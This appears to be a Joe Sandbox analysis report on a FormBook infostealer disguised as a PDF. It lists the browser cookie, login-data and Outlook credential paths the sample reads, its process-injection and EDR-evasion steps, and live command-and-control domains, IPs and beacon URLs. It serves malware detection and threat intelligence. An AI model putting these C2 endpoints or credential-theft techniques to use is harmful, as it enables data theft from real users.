                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3560935486.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3560872245.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2352816417.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3560408446.0000000001230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3561019858.00000000039F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2354528034.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\regini.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\regini.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3560935486.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3560872245.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2352816417.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3560408446.0000000001230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3561019858.00000000039F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2354528034.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		312
                Process Injection                		11
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		12
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Scheduled Task/Job                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Abuse Elevation Control Mechanism                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		312
                Process Injection                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput Capture5
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets113
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items14
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1574079 Sample: RFQ3978 39793980.pdf.exe Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 30 www.030002350.xyz 2->30 32 www.elitevibes.top 2->32 34 5 other IPs or domains 2->34 44 Suricata IDS alerts for network traffic 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 Yara detected FormBook 2->48 52 7 other signatures 2->52 10 RFQ3978 39793980.pdf.exe 3 2->10         started        signatures3 50 Performs DNS queries to domains with low reputation 30->50 process4 file5 28 C:\Users\...\RFQ3978 39793980.pdf.exe.log, ASCII 10->28 dropped 13 MSBuild.exe 10->13         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 16 shazRxxmQwU.exe 13->16 injected process8 signatures9 42 Found direct / indirect Syscall (likely to bypass EDR) 16->42 19 regini.exe 13 16->19         started        process10 signatures11 54 Tries to steal Mail credentials (via file / registry access) 19->54 56 Tries to harvest and steal browser information (history, passwords, etc) 19->56 58 Modifies the context of a thread in another process (thread injection) 19->58 60 3 other signatures 19->60 22 shazRxxmQwU.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 36 www.327531.buzz 43.199.54.158, 49829, 49835, 49841 LILLY-ASUS Japan 22->36 38 www.030002350.xyz 161.97.142.144, 49990, 49997, 50004 CONTABODE United States 22->38 40 4 other IPs or domains 22->40 62 Found direct / indirect Syscall (likely to bypass EDR) 22->62 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RFQ3978 39793980.pdf.exe100%AviraHEUR/AGEN.1305388
                RFQ3978 39793980.pdf.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.327531.buzz/iodk/0%Avira URL Cloudsafe
                http://www.030002350.xyz/1a7n/0%Avira URL Cloudsafe
                http://www.327531.buzz/iodk/?YdDTnh=dmGO6CepyY0nvsEaxU7IYLSZuGbeWFuYSER1oXhei8AaXzs2ne8+dyZVwWklDlgafwdROfr4xQPj+g6hlFS8zW1LJxia/FKHRGC6CNVENRR1k9XuyS8IPZU=&-n-l=OFJhRZgx2zhDqHF0%Avira URL Cloudsafe
                http://www.vayui.top/7nvw/?-n-l=OFJhRZgx2zhDqHF&YdDTnh=bbdDITTjVn5ZxI6BCVqDUznXmSvHXBsPP+WRiGeKfyb/2X6tLhCWc3R74LhPSoYzFVfNV33VjCQJaZkJOo229jlS83e+IdiqUppR8vJ/svaOFLmkzPo3ErA=0%Avira URL Cloudsafe
                http://www.elitevibes.top/a5zo/0%Avira URL Cloudsafe
                http://www.hm35s.top/ebw6/?YdDTnh=g7KNPNtXo04gJA8d7gjB2LBtOKC/EZQd0JNEKh4/LAY7mt0u3u5aX//D26eCeQ1UgdXt5Q7OBZBmmBkcIEzHCYDBDYgNJRKGsOkt2pAFFHXhbKxNJb1Qwag=&-n-l=OFJhRZgx2zhDqHF0%Avira URL Cloudsafe
                http://www.hm35s.top/ebw6/0%Avira URL Cloudsafe
                http://www.cg19g5.pro/63n1/0%Avira URL Cloudsafe
                http://www.cg19g5.pro/63n1/?-n-l=OFJhRZgx2zhDqHF&YdDTnh=wxKP0Ki1Kkw6YH74oBqG30+iQCgiXWBSdqxOdzuCPyveB98x1djFf0ZtvUhWTFSc0EIYzppqTCA/sqplXndAssyXGlxUbFrZ1byk2GCNxKon0UhL377cjTQ=0%Avira URL Cloudsafe
                http://www.elitevibes.top0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                bg.microsoft.map.fastly.net
                		199.232.210.172
                		truefalse
                  		high
                  www.vayui.top
                  		104.21.95.160
                  		truefalse
                    		high
                    hm35s.top
                    		154.23.184.95
                    		truetrue
                      		unknown
                      www.elitevibes.top
                      		66.29.149.46
                      		truetrue
                        		unknown
                        www.327531.buzz
                        		43.199.54.158
                        		truetrue
                          		unknown
                          s-part-0035.t-0009.t-msedge.net
                          		13.107.246.63
                          		truefalse
                            		high
                            www.cg19g5.pro
                            		154.88.22.105
                            		truetrue
                              		unknown
                              fp2e7a.wpc.phicdn.net
                              		192.229.221.95
                              		truefalse
                                		high
                                www.030002350.xyz
                                		161.97.142.144
                                		truetrue
                                  		unknown
                                  www.hm35s.top
                                  		unknown
                                  		unknownfalse
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.hm35s.top/ebw6/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.327531.buzz/iodk/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.030002350.xyz/1a7n/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.327531.buzz/iodk/?YdDTnh=dmGO6CepyY0nvsEaxU7IYLSZuGbeWFuYSER1oXhei8AaXzs2ne8+dyZVwWklDlgafwdROfr4xQPj+g6hlFS8zW1LJxia/FKHRGC6CNVENRR1k9XuyS8IPZU=&-n-l=OFJhRZgx2zhDqHFtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.vayui.top/7nvw/?-n-l=OFJhRZgx2zhDqHF&YdDTnh=bbdDITTjVn5ZxI6BCVqDUznXmSvHXBsPP+WRiGeKfyb/2X6tLhCWc3R74LhPSoYzFVfNV33VjCQJaZkJOo229jlS83e+IdiqUppR8vJ/svaOFLmkzPo3ErA=true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.cg19g5.pro/63n1/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.cg19g5.pro/63n1/?-n-l=OFJhRZgx2zhDqHF&YdDTnh=wxKP0Ki1Kkw6YH74oBqG30+iQCgiXWBSdqxOdzuCPyveB98x1djFf0ZtvUhWTFSc0EIYzppqTCA/sqplXndAssyXGlxUbFrZ1byk2GCNxKon0UhL377cjTQ=true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.elitevibes.top/a5zo/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.hm35s.top/ebw6/?YdDTnh=g7KNPNtXo04gJA8d7gjB2LBtOKC/EZQd0JNEKh4/LAY7mt0u3u5aX//D26eCeQ1UgdXt5Q7OBZBmmBkcIEzHCYDBDYgNJRKGsOkt2pAFFHXhbKxNJb1Qwag=&-n-l=OFJhRZgx2zhDqHFtrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabregini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.comRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designersGRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designers/?RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cn/bTheRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoregini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designers?RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.tiro.comRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.fontbureau.com/designersRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.goodfont.co.krRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.ecosia.org/newtab/regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.carterandcone.comlRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.sajatypeworks.comRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.typography.netDRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ac.ecosia.org/autocomplete?q=regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.fontbureau.com/designers/cabarga.htmlNRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.founder.com.cn/cn/cTheRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.galapagosdesign.com/staff/dennis.htmRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.founder.com.cn/cnRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.fontbureau.com/designers/frere-user.htmlRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://codepen.io/uzcho_/pens/popular/?grid_type=listregini.exe, 00000007.00000002.3561717968.0000000003F2E000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.0000000003D3E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://codepen.io/uzcho_/pen/eYdmdXw.cssregini.exe, 00000007.00000002.3561717968.0000000003F2E000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.0000000003D3E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchregini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.jiyu-kobo.co.jp/RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.galapagosdesign.com/DPleaseRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.fontbureau.com/designers8RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.fonts.comRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.sandoll.co.krRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.urwpp.deDPleaseRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.zhongyicts.com.cnRFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.elitevibes.topshazRxxmQwU.exe, 00000008.00000002.3560408446.0000000001287000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        http://www.sakkal.comRFQ3978 39793980.pdf.exe, 00000000.00000002.2081668749.0000000005184000.00000004.00000020.00020000.00000000.sdmp, RFQ3978 39793980.pdf.exe, 00000000.00000002.2081795719.0000000006952000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=regini.exe, 00000007.00000002.3563226970.000000000762D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high

                                                                                                            World Map of Contacted IPs

                                                                                                            • No. of IPs < 25%
                                                                                                            • 25% < No. of IPs < 50%
                                                                                                            • 50% < No. of IPs < 75%
                                                                                                            • 75% < No. of IPs

                                                                                                            Public IPs

                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                            161.97.142.144
                                                                                                            		www.030002350.xyzUnited States
                                                                                                            		51167CONTABODEtrue
                                                                                                            43.199.54.158
                                                                                                            		www.327531.buzzJapan4249LILLY-ASUStrue
                                                                                                            154.23.184.95
                                                                                                            		hm35s.topUnited States
                                                                                                            		174COGENT-174UStrue
                                                                                                            104.21.95.160
                                                                                                            		www.vayui.topUnited States
                                                                                                            		13335CLOUDFLARENETUSfalse
                                                                                                            154.88.22.105
                                                                                                            		www.cg19g5.proSeychelles
                                                                                                            		40065CNSERVERSUStrue
                                                                                                            66.29.149.46
                                                                                                            		www.elitevibes.topUnited States
                                                                                                            		19538ADVANTAGECOMUStrue

                                                                                                            General Information

                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                            Analysis ID:1574079
                                                                                                            Start date and time:2024-12-12 21:46:00 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 10m 33s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                            Run name:Run with higher sleep bypass
                                                                                                            Number of analysed new started processes analysed:9
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:2
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:RFQ3978 39793980.pdf.exe
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@6/6
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 75%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 91%
                                                                                                            • Number of executed functions: 93
                                                                                                            • Number of non-executed functions: 304
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                            Warnings

                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.12.23.50, 199.232.210.172, 13.85.23.206, 192.229.221.95, 13.107.246.63
                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                            • VT rate limit hit for: RFQ3978 39793980.pdf.exe

                                                                                                            Simulations

                                                                                                            Behavior and APIs

                                                                                                            No simulations

                                                                                                            Joe Sandbox View / Context

                                                                                                            IPs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            161.97.142.144SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.070001813.xyz/gn0y/
                                                                                                            PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                            • www.070002018.xyz/6m2n/
                                                                                                            New Purchase Order.exeGet hashmaliciousFormBookBrowse
